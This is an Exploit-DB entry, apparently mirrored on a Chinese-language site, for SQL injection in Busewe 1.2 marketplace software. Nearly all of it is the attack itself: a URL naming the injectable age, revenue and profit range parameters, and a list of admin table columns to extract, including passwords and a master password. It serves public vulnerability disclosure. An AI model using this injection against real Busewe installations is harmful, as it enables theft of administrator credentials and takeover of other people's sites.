Busewe 1.2 – SQL Injection

  • 作者: Ihsan Sencan
    日期: 2017-03-09
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/41561/
  • # # # # # 
    # Exploit Title: Busewe - Website Marketplace Software v1.2 - SQL Injection
    # Google Dork: N/A
    # Date: 09.03.2017
    # Vendor Homepage: https://www.ncrypted.net/
    # Software: https://www.ncrypted.net/busewe
    # Demo: http://demo.ncryptedprojects.com/busewe/
    # Version: 1.2
    # Tested on: Win7 x64, Kali Linux x64
    # # # # # 
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Mail : ihsan[@]ihsan[.]net
    # # # # #
    # SQL Injection/Exploit :
    # http://localhost/[PATH]/result?sort=desc&format=private&status=completed&age_min=[SQL]&age_max=[SQL]&revenue_min=[SQL]&revenue_max=[SQL]&profit_min=[SQL]&profit_max=[SQL]
    # admin :id
    # admin :username
    # admin :password
    # admin :masterPassword
    # admin :email
    # admin :role
    # admin :permissions
    # Etc..
    # # # # #